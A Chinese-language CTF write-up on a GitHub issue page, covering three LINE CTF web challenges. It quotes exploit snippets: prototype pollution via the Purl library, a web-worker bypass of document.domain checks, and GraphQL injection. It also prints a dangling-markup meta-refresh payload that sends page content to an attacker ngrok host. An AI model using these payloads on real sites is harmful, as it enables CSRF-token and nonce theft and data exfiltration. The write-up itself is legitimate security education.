You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
functionisInWindowContext(){consttmp=self;self=1;// magicconstres=(this!==self);self=tmp;returnres;}// Ensure it is in window context with correct domain only :)// Setting up variables and UIif(isInWindowContext()&&document.domain==='<%= domain %>'){consturlParams=newURLSearchParams(location.search);try{document.getElementById('error').innerText=urlParams.get('error');}catch(e){}try{document.getElementById('message').innerText=urlParams.get('message');}catch(e){}try{document.getElementById('_csrf').value='<%= csrf %>';}catch(e){}}
裡面有一個部分是用 web worker 來繞過對 window.location.href 以及 document.domain 的檢查,像是這樣:
// worker.jswindow={}window.location={}document={}// send the secret to top window!window.saveSecret=function(msg){self.postMessage(msg)}window.location.href="https://challenge-1022.intigriti.io/challenge/create";document.domain="challenge-1022.intigriti.io";// we can use importScripts function from API to import external scripts!importScripts("https://challenge-1022.intigriti.io/challenge/getSecret.js");
今年 Water Paddler 拿了第二名,總共 9 題 web 解掉了 8 題(我貢獻了 2 題),整體 web 的難度我覺得去年似乎比較難,今年比的人似乎也比較少一點。
話說最近我發現自己的 writeup 筆記沒有以前這麼多了,其中一個原因是最近比較忙,另一個原因是最近有興趣的題目(client side)沒這麼多,或我也有在想搞不好是隊友越變越強,還沒開題就被隊友解掉,我也懶得再去看題目,於是就懶得寫筆記了XD
這次只記幾題有參與或有興趣的,其他就先省略了。
Flag Masker (9 solves)
這題後端的程式碼很簡單,就是可以建立一個 note,然後輸出是安全的,沒有 XSS 的風險。
有趣的地方是 admin bot 接了一個 extension,程式碼有混淆過但幸好很短,worker.js 如下:
接收到 message 之後根據傳來的 regexp 去替換畫面上的內容,然後再傳回去。
而 content.js 是這樣:
這個程式碼就比較長一點了,不過在做的事情大概就是先讀取 config,然後把 body 跟 head 的內容都傳給剛剛的 worker 去做取代,取代完之後再放回畫面上,然後有找到符合的內容,回報給
n.data.attr.path + /alert
這個位置。上面那一大串如果搜尋一下,會發現是來自於 Purl 這個停止維護很久的 library,除了有 prototype pollution 的問題以外,對於網址的 parse 也是漏洞百出。
首先是 prototype pollution,我們只要污染 config 就可以控制
localStorage.config
屬性,傳入我們想要的 regexp,原本想的是可以弄個 ReDos 之類的再看怎麼樣去偵測時間,但後來發現n.data.attr.path
這個也是可以控制的。舉例來說,
http://web:8000/#@acabc//8cae-ip.ngrok.io
這個網址的 path 會被解析成//8cae-ip.ngrok.io
,所以可以把 request 傳到我們這裡來。再搭配前面講的 config,就可以知道哪個 regexp 有配對到。
除了這種解法以外,另一種更猛的是直接利用原本的功能做出 XSS,每一個 note 的結構是這樣:
假設我建立了兩個 note,第一個內容是
" id=a x="
,第二個是LINECTF{rotate-1 yellow-bg"}
HTML 內容就會變成:
其實
"
在後端一樣會被編碼,所以直接看 source 的話會看到"
,但如果是用document.body.innerHTML
,或許是瀏覽器覺得沒必要 encode,就會看到雙引號,而不是"
,所以雙引號的編碼反倒沒作用了。接著 extension 介入,把
rotate-1 yellow-bg"
變成 *** 之類的字,就變成:稍微調整一下新的結構:
前面的一個雙引號被取代掉,跟原本內容開頭的雙引號結合,最後面的
x="
則跟下一個結合,而中間的 id=a 順利變成了屬性的一部分。換句話說,我們可以對 div 插入任意屬性,就能利用 focus 的功能做出 XSS,底下是在 Discord 中 Renwa 給的 payload:
當時完全沒想到可以這樣,真是厲害。
Another Secure Store Note (7 solves)
這題有個改名字的功能,名字會直接反映在畫面上,是一個 free XSS,但問題是改名字會需要檢查 CSRF token,有一個叫做
getSettings.js
的檔案裡面會有 CSRF token:這邊會檢查是不是在 window context 以及
document.domain
,看到這邊我瞬間想起了 2022 年 10 月的 Intigriti XSS challenge,作者 writeup 在這:https://github.com/0xGodson/blogs/blob/master/_posts/2022-10-14-intigriti-oct-xss-challenge-author-writeup.md裡面有一個部分是用 web worker 來繞過對
window.location.href
以及document.domain
的檢查,像是這樣:所以這題特別檢查 context 應該是想把這個擋住,但幸好當時在研究 Intigriti 這個的時候,我發現
document.domain
其實可以自己用Object.defineProperty
硬蓋過去,所以這樣就可以 CSRF:再來就是要偷 nonce 了,這題用的瀏覽器是 Firefox,對於 Dangling Markup Injection 似乎沒做什麼防護,可以用 meta redirect 偷到下面的內容:
<meta http-equiv=refresh content='0; url=http://43d1-ip.ngrok.io/steal?q=
最後一步就是要阻止
csp.gif
的載入,因為只要這個被載入的話,nonce 就會改變,我花了一個半小時找尋怎麼把它擋掉,原本想說應該可以靠之前提過的 concurrent limit 來防止,但怎麼弄都不成功。最後發現原本
base-uri
是self
,所以 base 是可以用的,那就用 base 就好了,浪費了一小時 QQMomomomomemomemo (3 solves)
這題隊友解出來的,也滿有趣的,總之就是前端會根據你提供的 id 用 GraphQL 去抓結果:
在最後 query 的部分是使用了 persisted queries,以前有聽過,大概就是你先送 query 的 hash 出去,如果以前就有執行過的話,會直接送結果回來。
反之若是沒有,你就再送一次 hash + query,讓後端去 cache 結果,而前端的實作是這樣:
這邊前端也用了 Purl 這個 lib,所以一樣有 prototype pollution 可以用,但這題可以污染什麼呢?答案在底下這一段裡面:
你可以污染 path,就能操控
option.path
,但操控這個可以做什麼?這就跟後端的 i18n 邏輯有關了,實作如下:要注意的是
req.originalUrl
只會有 path 的部分,所以像 http://chall:11005/abc 的話,originalUrl 就會是/abc
。靠著上面操控的 path,我們可以把 path 污染成
/huli.tw/
,這樣送出的 URL 就是:http://34.85.126.119:11005//huli.tw/?extensions=...
,到了後端的 redirect 邏輯,最後就會被導到//huli.tw/en/?extension=...
。如此一來,就可以靠著 prototype pollution 把 request 導到自己的 server,拿到 query string。
這題的目的是要偷 admin 的 memo,可是我們並不知道 admin memo id,要怎麼辦呢?
仔細看這一段:
我們可以精心構造一個 id 達成 GraphQL injection,像這樣:
這樣就變成了兩個 query,原本應該是 memo 的 token 變成了 memos 的 token,就可以拿到所有 admin 的 note。
因此,最後的解法就是先送一次這個改造過的 query,讓 server 把結果存起來,再加上 prototype pollution,讓 request 導到我們的 server,就可以知道 hash 是多少,就能拿到結果。
The text was updated successfully, but these errors were encountered: